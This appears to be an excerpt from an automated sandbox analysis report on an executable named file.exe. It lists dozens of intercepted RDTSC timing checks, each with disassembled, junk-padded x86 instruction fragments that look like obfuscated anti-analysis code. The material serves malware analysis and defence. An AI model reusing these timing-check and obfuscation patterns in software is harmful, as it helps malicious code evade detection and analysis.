            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3302 second address: FB3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C403D6 second address: 2C4043E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD888D50BF7h 0x00000008 and ax, A51Eh 0x0000000d jmp 00007FD888D50BF9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FD888D50BF0h 0x0000001b or cx, 2318h 0x00000020 jmp 00007FD888D50BEBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov al, 24h 0x0000002c push eax 0x0000002d push edx 0x0000002e movsx ebx, ax 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C4043E second address: 2C4046D instructions: 0x00000000 rdtsc 0x00000002 mov ch, E5h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edx, dword ptr [ebp+0Ch] 0x0000000a jmp 00007FD888F38A2Bh 0x0000000f mov ecx, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD888F38A35h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C404A7 second address: 2C404D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 call 00007FD888D50BF9h 0x0000000e pop esi 0x0000000f mov ebx, 6E92BC74h 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C404D0 second address: 2C404D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E904ED second address: 4E90500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90500 second address: 4E9056C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD888F38A2Ch 0x00000011 jmp 00007FD888F38A35h 0x00000016 popfd 0x00000017 mov di, ax 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d mov ebx, 76685F4Eh 0x00000022 movsx edi, cx 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 mov dx, si 0x0000002b mov di, cx 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FD888F38A2Ch 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9056C second address: 4E90572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90572 second address: 4E90583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD888F38A2Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90583 second address: 4E90592 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90592 second address: 4E90596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90596 second address: 4E9059C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9059C second address: 4E905AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD888F38A2Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E905AD second address: 4E905B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E905B1 second address: 4E905C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E905C2 second address: 4E905C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E905C6 second address: 4E905CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E905CC second address: 4E905D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E905D2 second address: 4E905D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90688 second address: 4E9068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9068C second address: 4E906C5 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 0EC26D75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a cmp dword ptr [ebp-04h], 00000000h 0x0000000e jmp 00007FD888F38A30h 0x00000013 mov esi, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD888F38A37h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90760 second address: 4E80036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007FD888D50BE7h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007FD88CDFA023h 0x00000032 mov edi, edi 0x00000034 jmp 00007FD888D50BF6h 0x00000039 xchg eax, ebp 0x0000003a jmp 00007FD888D50BF0h 0x0000003f push eax 0x00000040 pushad 0x00000041 movsx edx, si 0x00000044 mov ah, 7Dh 0x00000046 popad 0x00000047 xchg eax, ebp 0x00000048 pushad 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80036 second address: 4E8005A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FD888F38A2Dh 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD888F38A2Dh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8005A second address: 4E80060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80060 second address: 4E80064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80064 second address: 4E800F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a pushad 0x0000000b jmp 00007FD888D50BF5h 0x00000010 pushfd 0x00000011 jmp 00007FD888D50BF0h 0x00000016 add si, 8CA8h 0x0000001b jmp 00007FD888D50BEBh 0x00000020 popfd 0x00000021 popad 0x00000022 push 527037B1h 0x00000027 pushad 0x00000028 call 00007FD888D50BF5h 0x0000002d pop eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007FD888D50BF3h 0x00000036 adc ax, AF4Eh 0x0000003b jmp 00007FD888D50BF9h 0x00000040 popfd 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E800F8 second address: 4E80156 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xor dword ptr [esp], 27DEA9F9h 0x0000000f jmp 00007FD888F38A33h 0x00000014 push 75E26DE9h 0x00000019 pushad 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e movsx edx, si 0x00000021 popad 0x00000022 xor dword ptr [esp], 004B4699h 0x00000029 pushad 0x0000002a jmp 00007FD888F38A34h 0x0000002f mov ecx, 37F3EAB1h 0x00000034 popad 0x00000035 mov eax, dword ptr fs:[00000000h] 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80156 second address: 4E8015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8015C second address: 4E801AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD888F38A2Eh 0x00000009 or ax, C3B8h 0x0000000e jmp 00007FD888F38A2Bh 0x00000013 popfd 0x00000014 call 00007FD888F38A38h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD888F38A2Dh 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E801AB second address: 4E801C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD888D50BEBh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E801C3 second address: 4E80243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD888F38A2Ch 0x00000013 and esi, 0CDAD208h 0x00000019 jmp 00007FD888F38A2Bh 0x0000001e popfd 0x0000001f mov eax, 45A8E07Fh 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 jmp 00007FD888F38A32h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FD888F38A2Ch 0x00000035 adc ax, 4798h 0x0000003a jmp 00007FD888F38A2Bh 0x0000003f popfd 0x00000040 mov si, C94Fh 0x00000044 popad 0x00000045 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80243 second address: 4E80249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80249 second address: 4E8024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8024D second address: 4E8028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a mov dx, 510Ch 0x0000000e jmp 00007FD888D50BF5h 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007FD888D50BF3h 0x0000001d pop ecx 0x0000001e mov edx, 3D3BE19Ch 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8028F second address: 4E802A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD888F38A31h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E802A4 second address: 4E802A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E802A8 second address: 4E802D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FD888F38A2Ah 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop esi 0x00000012 pop edi 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD888F38A2Fh 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E802D3 second address: 4E802F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E802F6 second address: 4E80315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FD888F38A39h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80315 second address: 4E80396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ebx, 24FD89B4h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD888D50BF3h 0x00000017 sub ch, 0000004Eh 0x0000001a jmp 00007FD888D50BF9h 0x0000001f popfd 0x00000020 call 00007FD888D50BF0h 0x00000025 pop esi 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FD888D50BEAh 0x00000032 adc ah, FFFFFFF8h 0x00000035 jmp 00007FD888D50BEBh 0x0000003a popfd 0x0000003b mov ax, 6A2Fh 0x0000003f popad 0x00000040 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80396 second address: 4E803FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [75AF4538h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD888F38A2Ch 0x00000015 xor ax, CE88h 0x0000001a jmp 00007FD888F38A2Bh 0x0000001f popfd 0x00000020 mov ecx, 3FB5B6FFh 0x00000025 popad 0x00000026 xor dword ptr [ebp-08h], eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007FD888F38A2Eh 0x00000032 add si, 30E8h 0x00000037 jmp 00007FD888F38A2Bh 0x0000003c popfd 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E803FF second address: 4E8045B instructions: 0x00000000 rdtsc 0x00000002 mov ah, A0h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, A418h 0x0000000a popad 0x0000000b xor eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD888D50BEAh 0x00000014 and ax, 4348h 0x00000019 jmp 00007FD888D50BEBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FD888D50BF8h 0x00000025 xor ax, 05A8h 0x0000002a jmp 00007FD888D50BEBh 0x0000002f popfd 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8045B second address: 4E8045F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8045F second address: 4E80465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80465 second address: 4E8047A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8047A second address: 4E80480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80480 second address: 4E80486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80486 second address: 4E8048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8048A second address: 4E8048E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8048E second address: 4E804EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FD888D50BF6h 0x00000011 add eax, 15BA6D98h 0x00000017 jmp 00007FD888D50BEBh 0x0000001c popfd 0x0000001d pop ecx 0x0000001e mov esi, edi 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 jmp 00007FD888D50BEBh 0x00000029 mov dword ptr fs:[00000000h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD888D50BF0h 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E804EE second address: 4E804FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E804FD second address: 4E80525 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-18h], esp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, 7D175959h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80525 second address: 4E80563 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr fs:[00000018h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD888F38A39h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80563 second address: 4E80569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80569 second address: 4E80612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f pushad 0x00000010 movzx eax, dx 0x00000013 pushfd 0x00000014 jmp 00007FD888F38A33h 0x00000019 or ecx, 4A0A193Eh 0x0000001f jmp 00007FD888F38A39h 0x00000024 popfd 0x00000025 popad 0x00000026 test ecx, ecx 0x00000028 pushad 0x00000029 mov ax, F223h 0x0000002d call 00007FD888F38A38h 0x00000032 call 00007FD888F38A32h 0x00000037 pop ecx 0x00000038 pop edx 0x00000039 popad 0x0000003a jns 00007FD888F38A68h 0x00000040 pushad 0x00000041 call 00007FD888F38A33h 0x00000046 mov bh, cl 0x00000048 pop edi 0x00000049 popad 0x0000004a add eax, ecx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80612 second address: 4E80616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80616 second address: 4E8061C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8061C second address: 4E80641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov dx, A36Eh 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80641 second address: 4E80688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 3Eh 0x00000005 pushfd 0x00000006 jmp 00007FD888F38A37h 0x0000000b sbb eax, 5B9470CEh 0x00000011 jmp 00007FD888F38A39h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test ecx, ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ebx, ecx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80688 second address: 4E8068C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70063 second address: 4E70067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70067 second address: 4E7006D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7006D second address: 4E70082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD888F38A31h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70082 second address: 4E70086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70086 second address: 4E700B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b jmp 00007FD888F38A2Dh 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FD888F38A2Eh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E700B4 second address: 4E700BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E700BA second address: 4E700C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E700C0 second address: 4E700C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E700C4 second address: 4E700E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD888F38A2Fh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E700E0 second address: 4E700E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E700E6 second address: 4E70109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FD888F38A35h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70109 second address: 4E7010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7010E second address: 4E7011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD888F38A2Ah 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7011C second address: 4E70120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7015B second address: 4E7015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7015F second address: 4E70165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70165 second address: 4E7018A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FD888F38A2Ah 0x00000013 pop esi 0x00000014 push edx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
